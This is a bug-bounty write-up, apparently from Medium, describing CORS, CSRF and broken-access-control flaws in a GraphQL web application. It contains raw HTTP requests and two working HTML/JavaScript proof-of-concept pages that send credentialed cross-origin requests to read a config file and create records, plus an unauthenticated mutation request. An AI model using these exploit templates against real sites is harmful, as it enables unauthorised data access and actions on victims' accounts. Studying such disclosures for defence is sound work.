Advance JSON Post Exploitation — CORS, CSRF, Broken Access Control

GET based CORS

  • The web application fails to properly validate the Origin header and returns the header Access-Control-Allow-Credentials: true and cookies were responsible to validate the user session.
  • So the application was vulnerable to CORS but no one was able to exploit it, because there was an additional payload in the Accept header (domain=example.com.webconfiguration; version=1) which was validating GET request, so the opening endpoint https://example.com/webpath/.webconfig will show a blank page in the browser, checking proxy I got to know the request as below.
GET /webpath/.webconfig HTTP/1.1
Host: example.com
Connection: close
Accept: application/json; domain=example.com.webconfiguration; version=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNT: 1
Origin: example.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,es;q=0.8
Cookie: xyz=1231
OPTIONS /endpoint HTTP/1.1 
Host: http://example.com
Connection: close Accept: */*
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Accept
Origin: null
<!DOCTYPE html>
<html>
<head>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
}
};
xhttp.open("GET", "https://example.com/webpath/.webconfig", true);
xhttp.setRequestHeader("Accept"," application/json; domain=example.com.webconfiguration; version=1")
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</head>
<body>
<center>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
</body>
</html>

POST based CORS / CSRF

POST /webpath/v1/graphql HTTP/1.1
Host: example.com
Content-Length: 395
Content-Type: application/json
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Origin: example.com
Cookie: xyz=1231

{"query":"mutation createTeamMember($teamMember: TeamMemberInput!) { createTeamMember(teamMember: $teamMember) { givenName id middleName organization personId phone { country display extension number } surname } }","variables":{"teamMember":{"givenName":"Testname","middleName":"Testmiddle","surname":"Testsurname","phone":{"country":"91","display":"0999999666","number":"999999666"},"organization":"9999"}}}
<!DOCTYPE html>
<html>
<head>
<script>



function csrf() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert("CSRF_EXPLOITED");
}
};

// create a JSON object
const json = {"query":"mutation createTeamMember($teamMember: TeamMemberInput!) { createTeamMember(teamMember: $teamMember) { givenName id middleName organization personId phone { country display extension number } surname } }","variables":{"teamMember":{"givenName":"Testname","middleName":"Testmiddle","surname":"Testsurname","phone":{"country":"91","display":"0999999666","number":"999999666"},"organization":"9999"}}};
xhttp.open('POST', 'https://example.com/webpath/v1/graphql');
xhttp.setRequestHeader("Content-Type"," application/json")

xhttp.withCredentials = true;
xhttp.send(JSON.stringify(json));
}
</script>

</head>
<body>
<center>
<div id="demo">
<button type="button" onclick="csrf()">Exploit</button>
</div>
</body>
</html>

Broken Access Control in JSON POST

  • When it comes to broken access control always check each request by removing Authorization Header as well as cookies, In my case application was using graphQL and keep checking each request manually in the repeater, and here removing cookies and Authorization header was still allowing me to fire GraphQL queries :D
POST /webpath/v1/graphql HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/graphql
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 259
Origin: https://example.com
Connection: close

{"query":"mutation createTeamMember($teamMember: TeamMemberInput!) { createTeamMember(teamMember: $teamMember) { givenName id middleName organization personId phone { country display extension number } surname } }","variables":{"teamMember":{"givenName":"Testname","middleName":"Testmiddle","surname":"Testsurname","phone":{"country":"91","display":"0999999666","number":"999999666"},"organization":"9999"}}}

--

--

--

https://www.facebook.com/0xVeera/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to get your Development Team to Love You?

5 Very Interesting Esoteric Programming Languages

PolkaWar Partners with Kitsumon

Remove Database Prefix From .sql Files With Powershell

Firebase Dev Summit: Recent Firebase Announcements

First Quarter Development Update

The new and powerful geotastic map editor

How to send magic tx for PHMN Stakedrop participation

Reactive Architecture: Domain Driven Design

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Akash Pawar

Akash Pawar

https://www.facebook.com/0xVeera/

More from Medium

Hacking with Subdomain3

XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain

One-liner Bug Bounty Tips

Insecure Direct Object Reference